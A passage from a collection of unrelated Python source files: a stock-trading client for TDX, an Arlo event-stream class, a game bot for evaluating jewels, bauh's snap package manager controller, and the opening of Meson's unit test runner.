4 市价委托(上海五档即成剩撤 / 深圳五档即成剩撤) 5 市价委托(深圳全额成交或撤销)
6 市价委托(上海五档即成转限价)
"""
order_type = 0
gddm = self.get_gddm(order_req.code) # 股东代码
status,content = self.trade_conn.SendOrder(direction,order_type,gddm,order_req.code,order_req.price,order_req.quantity)
if status < 0:
print "error: " + content.decode('gbk')
else:
print content.decode('gbk')
order_id = ''
return order_id
def get_code_by_order_id(self,order_id):
"""查询委托单的证券代码"""
order = self.orders.get(order_id)
if order:
return order.code
else:
print self.orders
return ''
def get_market_by_order_id(self,order_id):
"""根据订单编号查询市场编号"""
code = self.get_code_by_order_id(order_id)
return getMaketTypeByCode(code)
def cancelOrder(self,order_id):
market_id = self.get_market_by_order_id(order_id)
if market_id == Market_NULL:
print 'error: MarketID is Null :',order_id
return
errinfo,result = self.trade_conn.CancelOrder(market_id,order_id)
if errinfo:
print errinfo.decode('gbk')
else:
print result.decode('gbk')
def getPosition(self,code='',strategy_id='',direction= stbase.Constants.Buy):
"""查询指定 股票代码或者指定策略的持仓记录"""
if code:
pos = self.position_list.get(code)
if not pos:
pos = stbase.Position()
return pos
return self.position_list.values()
def getOrders(self,order_id='',code='',strategy_id=''):
"""查询委托信息,状态包括: 未成、部分成、全成、错误
strategy_id 作为 委托的 orign source 字段
"""
return self.orders.values()
def getAmountUsable(self):
"""账户可用资金"""
return self.stat.usable_amount
def getAmountAsset(self):
"""现货总资产"""
return self.stat.asset_amount
class TdxPosition(stbase.Position):
"""持仓记录"""
def __init__(self):
stbase.Position.__init__(self)
self.name = '' # 证券名称
self.last_price = 0 # 当前价格
self.gddm = '' # 股东代码
if __name__ == '__main__':
trader = TDX_StockTrader().init()
trader.open()
trader.wait_for_shutdown()
|
eventstream.py
|
##
# Copyright 2016 Jeffrey D. Walter
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
import monotonic
import threading
import sys
if sys.version[0] == '2':
import Queue as queue
else:
import queue as queue
# TODO: There's a lot more refactoring that could/should be done to abstract out the arlo-specific implementation details.
class EventStream(object):
"""This class provides a queue-based EventStream object."""
def __init__(self, event_handler, heartbeat_handler, sse, id, args):
self.connected = False
self.registered = False
self.queue = queue.Queue()
self.heartbeat_stop_event = threading.Event()
self.event_stream_stop_event = threading.Event()
self.arlo = args[0]
self.heartbeat_handler = heartbeat_handler
self.id = id
try:
self.event_stream_thread = threading.Thread(name="EventStream_" + self.id, target=event_handler, args=(self.arlo, sse, self.event_stream_stop_event, ))
self.event_stream_thread.setDaemon(True)
if args[1] == True:
self.Connect()
except Exception as e:
raise Exception('Failed to subscribe to eventstream: {0}'.format(e))
def __del__(self):
self.Disconnect()
def Get(self, block=True, timeout=None):
if sys.version[0] == '2' and block:
if timeout:
timeout += monotonic.monotonic()
# If timeout is None, then just pick some arbitrarily large # for the timeout value.
else:
timeout = 1000000 + monotonic.monotonic()
while True:
try:
# Allow check for Ctrl-C every second
item = self.queue.get(timeout=min(1, timeout - monotonic.monotonic()))
self.queue.task_done()
return item
except queue.Empty:
if monotonic.monotonic() > timeout:
return None
else:
pass
else:
try:
item = self.queue.get(block=block, timeout=timeout)
self.queue.task_done()
return item
except queue.Empty as e:
return None
except Exception as e:
return None
def Start(self):
self.event_stream_thread.start()
return self
def Connect(self):
self.connected = True
def Disconnect(self):
self.connected = False
self.Unregister()
def Register(self):
self.heartbeat_thread = threading.Thread(name='HeartbeatThread_' + self.id, target=self.heartbeat_handler, args=(self.arlo, self.heartbeat_stop_event, ))
self.heartbeat_thread.setDaemon(True)
self.heartbeat_thread.start()
self.registered = True
def Unregister(self):
self.registered = False
if self.queue:
self.queue.put(None)
self.event_stream_stop_event.set()
self.heartbeat_stop_event.set()
if self.event_stream_thread != threading.current_thread():
self.event_stream_thread.join()
if self.heartbeat_thread != threading.current_thread():
self.heartbeat_thread.join()
|
bot.py
|
import logging
import time
import sys
import numpy as np
import re
import time
import keyboard
from multiprocessing import Value, Process
from queue import Queue
from bson.objectid import ObjectId
from datetime import datetime
from .trader import Trader
from .tree_navigator import TreeNavigator
from .utils import get_config, filter_mod
from .input_handler import InputHandler
class Bot:
def __init__(self):
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(message)s",
datefmt="[%H:%M:%S %d-%m-%Y]",
filename="jewels.log",
encoding='utf-8',
)
self.log = logging.getLogger("bot")
self.config = get_config("bot")
self.resolution = self.split_res(self.config["resolution"])
self.nonalpha_re = re.compile("[^a-zA-Z]")
self.trader = Trader(self.resolution, self.config["accept_trades"])
self.input_handler = InputHandler(self.resolution)
self.halt = Value("i", False)
self.hotkey_killer = Process(
target=hotkey_killer, args=(self.halt, self.config["exit_hotkey"])
)
self.hotkey_killer.daemon = True
self.hotkey_killer.start()
def loop(self):
# self.log.info(
print(
"Quit the application by pressing %s" % self.config["exit_hotkey"]
)
# self.log.info(
print(
"Bot starts in %s seconds. Please tab into the game client."
% self.config["initial_sleep"]
)
time.sleep(int(self.config["initial_sleep"]))
while True:
if self.config["accept_trades"]:
empty = self.trader.verify_empty_inventory()
if not empty:
self.trader.stash_items()
username = self.trader.wait_for_trade()
successfully_received = self.trader.get_items(username)
if not successfully_received:
continue
else:
username = "nerdyjoe314"
jewel_locations, descriptions = self.trader.get_jewel_locations()
self.log.info("Got %s new jewels" % len(jewel_locations))
long_break_at_idx = np.random.choice(
60, self.config["breaks_per_full_inventory"]
)
for idx, jewel_location in enumerate(jewel_locations):
if not self._run():
self.log.info("Exiting.")
return
self.log.info(
"Analyzing jewel (%s/%s) with description: %s"
% (idx, len(jewel_locations), descriptions[idx])
)
if idx in long_break_at_idx:
self.log.info("Taking a break of around 5 minutes.")
self.input_handler.rnd_sleep(mean=300000, sigma=100000, min=120000)
self.tree_nav = TreeNavigator(self.resolution, self.halt)
analysis_time = datetime.utcnow()
name, description = self.tree_nav.eval_jewel(
jewel_location
)
print(
"Jewel evaluation took %s seconds"
% (datetime.utcnow() - analysis_time).seconds
)
self.log.info(
"Jewel evaluation took %s seconds"
% (datetime.utcnow() - analysis_time).seconds
)
if self.config["accept_trades"]:
self.trader.return_items(username, jewel_locations)
else:
self.log.info("Inventory analysis complete!")
break
# def store_items(self, socket_instances):
# # Add some filtered summed values for easier querying
# for jewel_inst in socket_instances:
# jewel_inst["summed_mods"] = {}
# for node in jewel_inst["socket_nodes"]:
# for mod in node["mods"]:
# filt_mod, value = filter_mod(mod, regex=self.nonalpha_re)
# if filt_mod in jewel_inst["summed_mods"]:
# jewel_inst["summed_mods"][filt_mod] += value
# else:
# jewel_inst["summed_mods"][filt_mod] = value
#return result
def split_res(self, resolution):
resolution = [int(n) for n in resolution.split("x")]
return resolution
def _run(self):
halt = bool(self.halt.value)
if halt:
self.hotkey_killer.join()
return not halt
def hotkey_killer(halt_value, hotkey):
while True:
if keyboard.is_pressed(hotkey):
halt_value.value += 1
return
time.sleep(0.1)
|
controller.py
|
import re
import time
import traceback
from threading import Thread
from typing import List, Set, Type, Optional, Tuple
from bauh.api.abstract.controller import SoftwareManager, SearchResult, ApplicationContext, UpgradeRequirements, \
TransactionResult, SoftwareAction
from bauh.api.abstract.disk import DiskCacheLoader
from bauh.api.abstract.handler import ProcessWatcher, TaskManager
from bauh.api.abstract.model import SoftwarePackage, PackageHistory, PackageUpdate, PackageSuggestion, \
SuggestionPriority, CustomSoftwareAction, PackageStatus
from bauh.api.abstract.view import SingleSelectComponent, SelectViewType, InputOption, ViewComponent, PanelComponent, \
FormComponent, TextInputComponent
from bauh.api.exception import NoInternetException
from bauh.commons import resource
from bauh.commons.boot import CreateConfigFile
from bauh.commons.category import CategoriesDownloader
from bauh.commons.html import bold
from bauh.commons.system import SystemProcess, ProcessHandler, new_root_subprocess, get_human_size_str
from bauh.commons.view_utils import new_select
from bauh.gems.snap import snap, URL_CATEGORIES_FILE, CATEGORIES_FILE_PATH, SUGGESTIONS_FILE, \
get_icon_path, snapd, ROOT_DIR
from bauh.gems.snap.config import SnapConfigManager
from bauh.gems.snap.model import SnapApplication
from bauh.gems.snap.snapd import SnapdClient
RE_AVAILABLE_CHANNELS = re.compile(re.compile(r'(\w+)\s+(snap install.+)'))
class SnapManager(SoftwareManager):
def __init__(self, context: ApplicationContext):
super(SnapManager, self).__init__(context=context)
self.i18n = context.i18n
self.api_cache = context.cache_factory.new()
context.disk_loader_factory.map(SnapApplication, self.api_cache)
self.enabled = True
self.http_client = context.http_client
self.logger = context.logger
self.ubuntu_distro = context.distro == 'ubuntu'
self.categories = {}
self.suggestions_cache = context.cache_factory.new()
self.info_path = None
self.configman = SnapConfigManager()
self.custom_actions = (
CustomSoftwareAction(i18n_status_key='snap.action.refresh.status',
i18n_label_key='snap.action.refresh.label',
icon_path=resource.get_path('img/refresh.svg', ROOT_DIR),
manager_method='refresh',
requires_root=True,
i18n_confirm_key='snap.action.refresh.confirm'),
CustomSoftwareAction(i18n_status_key='snap.action.channel.status',
i18n_label_key='snap.action.channel.label',
i18n_confirm_key='snap.action.channel.confirm',
icon_path=resource.get_path('img/refresh.svg', ROOT_DIR),
manager_method='change_channel',
requires_root=True,
requires_confirmation=False)
)
def _fill_categories(self, app: SnapApplication):
categories = self.categories.get(app.name.lower())
if categories:
app.categories = categories
if not app.is_application():
categories = app.categories
if categories is None:
categories = []
app.categories = categories
if 'runtime' not in categories:
categories.append('runtime')
def search(self, words: str, disk_loader: DiskCacheLoader, limit: int = -1, is_url: bool = False) -> SearchResult:
if is_url or (not snap.is_installed() and not snapd.is_running()):
return SearchResult([], [], 0)
snapd_client = SnapdClient(self.logger)
apps_found = snapd_client.query(words)
res = SearchResult([], [], 0)
if apps_found:
installed = self.read_installed(disk_loader).installed
for app_json in apps_found:
already_installed = None
if installed:
already_installed = [i for i in installed if i.id == app_json.get('id')]
already_installed = already_installed[0] if already_installed else None
if already_installed:
res.installed.append(already_installed)
else:
res.new.append(self._map_to_app(app_json, installed=False))
res.total = len(res.installed) + len(res.new)
return res
def read_installed(self, disk_loader: DiskCacheLoader, limit: int = -1, only_apps: bool = False, pkg_types: Set[Type[SoftwarePackage]] = None, internet_available: bool = None) -> SearchResult:
if snap.is_installed() and snapd.is_running():
snapd_client = SnapdClient(self.logger)
app_names = {a['snap'] for a in snapd_client.list_only_apps()}
installed = [self._map_to_app(app_json=appjson,
installed=True,
disk_loader=disk_loader,
is_application=app_names and appjson['name'] in app_names) for appjson in snapd_client.list_all_snaps()]
return SearchResult(installed, None, len(installed))
else:
return SearchResult([], None, 0)
def downgrade(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher) -> bool:
if not snap.is_installed():
watcher.print("'snap' seems not to be installed")
return False
if not snapd.is_running():
watcher.print("'snapd' seems not to be running")
return False
return ProcessHandler(watcher).handle_simple(snap.downgrade_and_stream(pkg.name, root_password))[0]
def upgrade(self, requirements: UpgradeRequirements, root_password: str, watcher: ProcessWatcher) -> SystemProcess:
raise Exception(f"'upgrade' is not supported by {SnapManager.__class__.__name__}")
def uninstall(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher, disk_loader: DiskCacheLoader) -> TransactionResult:
if snap.is_installed() and snapd.is_running():
uninstalled = ProcessHandler(watcher).handle_simple(snap.uninstall_and_stream(pkg.name, root_password))[0]
if uninstalled:
if self.suggestions_cache:
self.suggestions_cache.delete(pkg.name)
return TransactionResult(success=True, installed=None, removed=[pkg])
return TransactionResult.fail()
def get_managed_types(self) -> Set[Type[SoftwarePackage]]:
return {SnapApplication}
def clean_cache_for(self, pkg: SnapApplication):
super(SnapManager, self).clean_cache_for(pkg)
self.api_cache.delete(pkg.id)
def get_info(self, pkg: SnapApplication) -> dict:
info = {
'description': pkg.description,
'developer': pkg.developer,
'license': pkg.license,
'contact': pkg.contact,
'snap-id': pkg.id,
'name': pkg.name,
'publisher': pkg.publisher,
'revision': pkg.rev,
'tracking': pkg.tracking,
'channel': pkg.channel,
'type': pkg.type
}
if pkg.installed:
commands = [*{c['name'] for c in SnapdClient(self.logger).list_commands(pkg.name)}]
commands.sort()
info['commands'] = commands
if pkg.installed_size:
info['installed_size']: get_human_size_str(pkg.installed_size)
elif pkg.download_size:
info['download_size'] = get_human_size_str(pkg.download_size)
return info
def get_history(self, pkg: SnapApplication) -> PackageHistory:
raise Exception(f"'get_history' is not supported by {pkg.__class__.__name__}")
def install(self, pkg: SnapApplication, root_password: str, disk_loader: DiskCacheLoader, watcher: ProcessWatcher) -> TransactionResult:
# retrieving all installed so it will be possible to know the additional installed runtimes after the operation succeeds
if not snap.is_installed():
watcher.print("'snap' seems not to be installed")
return TransactionResult.fail()
if not snapd.is_running():
watcher.print("'snapd' seems not to be running")
return TransactionResult.fail()
installed_names = {s['name'] for s in SnapdClient(self.logger).list_all_snaps()}
client = SnapdClient(self.logger)
snap_config = self.configman.get_config()
try:
channel = self._request_channel_installation(pkg=pkg, snap_config=snap_config, snapd_client=client, watcher=watcher)
pkg.channel = channel
except:
watcher.print('Aborted by user')
return TransactionResult.fail()
res, output = ProcessHandler(watcher).handle_simple(snap.install_and_stream(app_name=pkg.name,
confinement=pkg.confinement,
root_password=root_password,
channel=channel))
if 'error:' in output:
res = False
if 'not available on stable' in output:
channels = RE_AVAILABLE_CHANNELS.findall(output)
if channels:
opts = [InputOption(label=c[0], value=c[1]) for c in channels]
channel_select = SingleSelectComponent(type_=SelectViewType.RADIO, label='', options=opts, default_option=opts[0])
body = f"<p>{self.i18n['snap.install.available_channels.message'].format(bold(self.i18n['stable']), bold(pkg.name))}.</p>"
body += f"<p>{self.i18n['snap.install.available_channels.help']}:</p>"
if watcher.request_confirmation(title=self.i18n['snap.install.available_channels.title'],
body=body,
components=[channel_select],
confirmation_label=self.i18n['continue'],
deny_label=self.i18n['cancel']):
self.logger.info(f"Installing '{pkg.name}' with the custom command '{channel_select.value}'")
res = ProcessHandler(watcher).handle(SystemProcess(new_root_subprocess(channel_select.value.value.split(' '), root_password=root_password)))
return self._gen_installation_response(success=res, pkg=pkg,
installed=installed_names, disk_loader=disk_loader)
else:
self.logger.error(f"Could not find available channels in the installation output: {output}")
return self._gen_installation_response(success=res, pkg=pkg, installed=installed_names, disk_loader=disk_loader)
def _gen_installation_response(self, success: bool, pkg: SnapApplication, installed: Set[str], disk_loader: DiskCacheLoader):
if success:
new_installed = []
try:
net_available = self.context.internet_checker.is_available()
current_installed = self.read_installed(disk_loader=disk_loader, internet_available=net_available).installed
except:
new_installed = [pkg]
traceback.print_exc()
current_installed = None
if current_installed:
for p in current_installed:
if p.name == pkg.name or (not installed or p.name not in installed):
new_installed.append(p)
return TransactionResult(success=success, installed=new_installed, removed=[])
else:
return TransactionResult.fail()
def is_enabled(self) -> bool:
return self.enabled
def set_enabled(self, enabled: bool):
self.enabled = enabled
def can_work(self) -> Tuple[bool, Optional[str]]:
return (True, None) if snap.is_installed() else (False, self.i18n['missing_dep'].format(dep=bold('snap')))
def requires_root(self, action: SoftwareAction, pkg: SnapApplication) -> bool:
return action not in (SoftwareAction.PREPARE, SoftwareAction.SEARCH)
def refresh(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher) -> bool:
return ProcessHandler(watcher).handle_simple(snap.refresh_and_stream(pkg.name, root_password))[0]
def change_channel(self, pkg: SnapApplication, root_password: str, watcher: ProcessWatcher) -> bool:
if not self.context.internet_checker.is_available():
raise NoInternetException()
try:
channel = self._request_channel_installation(pkg=pkg,
snap_config=None,
snapd_client=SnapdClient(self.logger),
watcher=watcher,
exclude_current=True)
if not channel:
watcher.show_message(title=self.i18n['snap.action.channel.label'],
body=self.i18n['snap.action.channel.error.no_channel'])
return False
return ProcessHandler(watcher).handle_simple(snap.refresh_and_stream(app_name=pkg.name,
root_password=root_password,
channel=channel))[0]
except:
return False
def _start_category_task(self, taskman: TaskManager, create_config: CreateConfigFile, downloader: CategoriesDownloader):
if taskman:
taskman.update_progress('snap_cats', 0, self.i18n['task.waiting_task'].format(bold(create_config.task_name)))
create_config.join()
categories_exp = create_config.config['categories_exp']
downloader.expiration = categories_exp if isinstance(categories_exp, int) else None
taskman.update_progress('snap_cats', 1, None)
def _finish_category_task(self, taskman: TaskManager):
if taskman:
taskman.update_progress('snap_cats', 100, None)
taskman.finish_task('snap_cats')
def prepare(self, task_manager: TaskManager, root_password: str, internet_available: bool):
create_config = CreateConfigFile(taskman=task_manager, configman=self.configman, i18n=self.i18n,
task_icon_path=get_icon_path(), logger=self.logger)
create_config.start()
task_manager.register_task('snap_cats', self.i18n['task.download_categories'], get_icon_path())
category_downloader = CategoriesDownloader(id_='snap', manager=self, http_client=self.http_client,
logger=self.logger,
url_categories_file=URL_CATEGORIES_FILE,
categories_path=CATEGORIES_FILE_PATH,
internet_connection=internet_available,
internet_checker=self.context.internet_checker,
after=lambda: self._finish_category_task(task_manager))
category_downloader.before = lambda: self._start_category_task(task_manager, create_config, category_downloader)
category_downloader.start()
def list_updates(self, internet_available: bool) -> List[PackageUpdate]:
pass
def list_warnings(self, internet_available: bool) -> Optional[List[str]]:
if not snapd.is_running():
snap_bold = bold('Snap')
return [self.i18n['snap.notification.snapd_unavailable'].format(bold('snapd'), snap_bold),
self.i18n['snap.notification.snap.disable'].format(snap_bold,
bold(f"{self.i18n['settings'].capitalize()} > {self.i18n['core.config.tab.types']}"))]
elif internet_available:
available, output = snap.is_api_available()
if not available:
self.logger.warning(f'It seems Snap API is not available. Search output: {output}')
return [self.i18n['snap.notifications.api.unavailable'].format(bold('Snaps'), bold('Snap'))]
def _fill_suggestion(self, name: str, priority: SuggestionPriority, snapd_client: SnapdClient, out: List[PackageSuggestion]):
res = snapd_client.find_by_name(name)
if res:
if len(res) == 1:
app_json = res[0]
else:
jsons_found = [p for p in res if p['name'] == name]
app_json = jsons_found[0] if jsons_found else None
if app_json:
sug = PackageSuggestion(self._map_to_app(app_json, False), priority)
self.suggestions_cache.add(name, sug)
out.append(sug)
return
self.logger.warning(f"Could not retrieve suggestion '{name}'")
def _map_to_app(self, app_json: dict, installed: bool, disk_loader: Optional[DiskCacheLoader] = None, is_application: bool = False) -> SnapApplication:
app = SnapApplication(id=app_json.get('id'),
name=app_json.get('name'),
license=app_json.get('license'),
version=app_json.get('version'),
latest_version=app_json.get('version'),
description=app_json.get('description', app_json.get('summary')),
installed=installed,
rev=app_json.get('revision'),
publisher=app_json['publisher'].get('display-name', app_json['publisher'].get('username')),
verified_publisher=app_json['publisher'].get('validation') == 'verified',
icon_url=app_json.get('icon'),
screenshots={m['url'] for m in app_json.get('media', []) if m['type'] == 'screenshot'},
download_size=app_json.get('download-size'),
channel=app_json.get('channel'),
confinement=app_json.get('confinement'),
app_type=app_json.get('type'),
app=is_application,
installed_size=app_json.get('installed-size'),
extra_actions=self.custom_actions)
if disk_loader and app.installed:
disk_loader.fill(app)
self._fill_categories(app)
app.status = PackageStatus.READY
return app
def list_suggestions(self, limit: int, filter_installed: bool) -> List[PackageSuggestion]:
res = []
if snapd.is_running():
self.logger.info(f'Downloading suggestions file {SUGGESTIONS_FILE}')
file = self.http_client.get(SUGGESTIONS_FILE)
if not file or not file.text:
self.logger.warning(f"No suggestion found in {SUGGESTIONS_FILE}")
return res
else:
self.logger.info('Mapping suggestions')
suggestions, threads = [], []
snapd_client = SnapdClient(self.logger)
installed = {s['name'].lower() for s in snapd_client.list_all_snaps()}
for l in file.text.split('\n'):
if l:
if limit <= 0 or len(suggestions) < limit:
sug = l.strip().split('=')
name = sug[1]
if not installed or name not in installed:
cached_sug = self.suggestions_cache.get(name)
if cached_sug:
res.append(cached_sug)
else:
t = Thread(target=self._fill_suggestion, args=(name, SuggestionPriority(int(sug[0])), snapd_client, res))
t.start()
threads.append(t)
time.sleep(0.001) # to avoid being blocked
else:
break
for t in threads:
t.join()
res.sort(key=lambda s: s.priority.value, reverse=True)
return res
def is_default_enabled(self) -> bool:
return True
def launch(self, pkg: SnapApplication):
commands = SnapdClient(self.logger).list_commands(pkg.name)
if commands:
if len(commands) == 1:
cmd = commands[0]['name']
else:
desktop_cmd = [c for c in commands if 'desktop-file' in c]
if desktop_cmd:
cmd = desktop_cmd[0]['name']
else:
cmd = commands[0]['name']
self.logger.info(f"Running '{pkg.name}': {cmd}")
snap.run(cmd)
def get_screenshots(self, pkg: SnapApplication) -> List[str]:
return pkg.screenshots if pkg.has_screenshots() else []
def get_settings(self, screen_width: int, screen_height: int) -> Optional[ViewComponent]:
snap_config = self.configman.get_config()
max_width = 200
install_channel = new_select(label=self.i18n['snap.config.install_channel'],
opts=[(self.i18n['yes'].capitalize(), True, None),
(self.i18n['no'].capitalize(), False, None)],
value=bool(snap_config['install_channel']),
id_='snap_install_channel',
max_width=max_width,
tip=self.i18n['snap.config.install_channel.tip'])
categories_exp = TextInputComponent(id_='snap_cat_exp',
value=snap_config['categories_exp'] if isinstance(snap_config['categories_exp'], int) else '',
max_width=max_width,
only_int=True,
label=self.i18n['snap.config.categories_exp'],
tooltip=self.i18n['snap.config.categories_exp.tip'])
return PanelComponent([FormComponent([install_channel, categories_exp], self.i18n['installation'].capitalize())])
def save_settings(self, component: ViewComponent) -> Tuple[bool, Optional[List[str]]]:
snap_config = self.configman.get_config()
panel = component.components[0]
snap_config['install_channel'] = panel.get_component('snap_install_channel').get_selected()
snap_config['categories_exp'] = panel.get_component('snap_cat_exp').get_int_value()
try:
self.configman.save_config(snap_config)
return True, None
except:
return False, [traceback.format_exc()]
def _request_channel_installation(self, pkg: SnapApplication, snap_config: Optional[dict], snapd_client: SnapdClient, watcher: ProcessWatcher, exclude_current: bool = False) -> Optional[str]:
if snap_config is None or snap_config['install_channel']:
try:
data = [r for r in snapd_client.find_by_name(pkg.name) if r['name'] == pkg.name]
except:
self.logger.warning(f"snapd client could not retrieve channels for '{pkg.name}'")
return
if not data:
self.logger.warning(f"snapd client could find a match for name '{pkg.name}' when retrieving its channels")
else:
if not data[0].get('channels'):
self.logger.info(f"No channel available for '{pkg.name}'. Skipping selection.")
else:
if pkg.channel:
current_channel = pkg.channel if '/' in pkg.channel else f'latest/{pkg.channel}'
else:
current_channel = f"latest/{data[0].get('channel', 'stable')}"
opts = []
def_opt = None
for channel in sorted(data[0]['channels'].keys()):
if exclude_current:
if channel != current_channel:
opts.append(InputOption(label=channel, value=channel))
else:
op = InputOption(label=channel, value=channel)
opts.append(op)
if not def_opt and channel == current_channel:
def_opt = op
if not opts:
self.logger.info(f"No different channel available for '{pkg.name}'. Skipping selection.")
return
select = SingleSelectComponent(label='',
options=opts,
default_option=def_opt if def_opt else opts[0],
type_=SelectViewType.RADIO)
if not watcher.request_confirmation(title=self.i18n['snap.install.available_channels.title'],
body=self.i18n['snap.install.channel.body'] + ':',
components=[select],
confirmation_label=self.i18n['proceed'].capitalize(),
deny_label=self.i18n['cancel'].capitalize()):
raise Exception('aborted')
else:
return select.get_selected()
|
run_unittests.py
|
#!/usr/bin/env python3
# Copyright 2016-2017 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import urllib.error
import urllib.request
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.compilers
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
windows_proof_rmtree, python_command, version_compare, split_args,
quote_arg
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
from mesonbuild.build import Target
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from run_tests import (
Backend, FakeBuild, FakeCompilerOptions,
ensure_backend_detects_changes, exe_suffix, get_backend_commands,
get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
run_configure_inprocess, run_mtest_inprocess
)
URLOPEN_TIMEOUT = 5
def get_dynamic_section_entry(fname, entry):
if is_cygwin() or is_osx():
raise unittest.SkipTest('Test only applicable to ELF platforms')
try:
raw_out = subprocess.check_output(['readelf', '-d', fname],
universal_newlines=True)
except FileNotFoundError:
# FIXME: Try using depfixer.py:Elf() as a fallback
raise unittest.SkipTest('readelf not found')
pattern = re.compile(entry + r': \[(.*?)\]')
for line in raw_out.split('\n'):
m = pattern.search(line)
if m is not None:
return m.group(1)
return None # The file did not contain the specified entry.
def get_soname(fname):
return get_dynamic_section_entry(fname, 'soname')
def get_rpath(fname):
return get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
def is_tarball():
if not os.path.isdir('docs'):
return True
return False
def is_ci():
if 'CI' in os.environ:
return True
return False
def is_pull():
# Travis
if os.environ.get('TRAVIS_PULL_REQUEST', 'false') != 'false':
return True
# Azure
if 'SYSTEM_PULLREQUEST_ISFORK' in os.environ:
return True
return False
def _git_init(project_dir):
subprocess.check_call(['git', 'init'], cwd=project_dir, stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'config',
'user.name', 'Author Person'], cwd=project_dir)
subprocess.check_call(['git', 'config',
'user.email', 'teh_coderz@example.com'], cwd=project_dir)
subprocess.check_call('git add *', cwd=project_dir, shell=True,
stdout=subprocess.DEVNULL)
subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
stdout=subprocess.DEVNULL)
@functools.lru_cache()
def is_real_gnu_compiler(path):
'''
Check if the gcc we have is a real gcc and not a macOS wrapper around clang
'''
if not path:
return False
out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
return 'Free Software Foundation' in out
def skipIfNoExecutable(exename):
'''
Skip this test if the given executable is not found.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if shutil.which(exename) is None:
raise unittest.SkipTest(exename + ' not found')
return func(*args, **kwargs)
return wrapped
return wrapper
def skipIfNoPkgconfig(f):
'''
Skip this test if no pkg-config is found, unless we're on CI.
This allows users to run our test suite without having
pkg-config installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
Note: Yes, we provide pkg-config even while running Windows CI
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
return f(*args, **kwargs)
return wrapped
def skipIfNoPkgconfigDep(depname):
'''
Skip this test if the given pkg-config dep is not found, unless we're on CI.
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('pkg-config') is None:
raise unittest.SkipTest('pkg-config not found')
if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_no_cmake(f):
'''
Skip this test if no cmake is found, unless we're on CI.
This allows users to run our test suite without having
cmake installed on, f.ex., macOS, while ensuring that our CI does not
silently skip the test because of misconfiguration.
'''
@functools.wraps(f)
def wrapped(*args, **kwargs):
if not is_ci() and shutil.which('cmake') is None:
raise unittest.SkipTest('cmake not found')
return f(*args, **kwargs)
return wrapped
def skip_if_not_language(lang):
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
try:
env = get_fake_env()
f = getattr(env, 'detect_{}_compiler'.format(lang))
f(MachineChoice.HOST)
except EnvironmentException:
raise unittest.SkipTest('No {} compiler found.'.format(lang))
return func(*args, **kwargs)
return wrapped
return wrapper
def skip_if_env_set(key):
'''
Skip a test if a particular env is set, except when running under CI
'''
def wrapper(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
old = None
if key in os.environ:
if not is_ci():
raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
old = os.environ.pop(key)
try:
return func(*args, **kwargs)
finally:
if old is not None:
os.environ[key] = old
return wrapped
return wrapper
def skip_if_not_base_option(feature):
"""Skip tests if The compiler does not support a given base option.
for example, ICC doesn't currently support b_sanitize.
"""
def actual(f):
@functools.wraps(f)
def wrapped(*args, **kwargs):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if feature not in cc.base_options:
raise unittest.SkipTest(
'{} not available with {}'.format(feature, cc.id))
return f(*args, **kwargs)
return wrapped
return actual
@contextmanager
def temp_filename():
'''A context manager which provides a filename to an empty temporary file.
On exit the file will be deleted.
'''
fd, filename = tempfile.mkstemp()
os.close(fd)
try:
yield filename
finally:
try:
os.remove(filename)
except OSError:
pass
@contextmanager
def no_pkgconfig():
'''
A context manager that overrides shutil.which and ExternalProgram to force
them to return None for pkg-config to simulate it not existing.
'''
old_which = shutil.which
old_search = ExternalProgram._search
def new_search(self, name, search_dir):
if name == 'pkg-config':
return [None]
return old_search(self, name, search_dir)
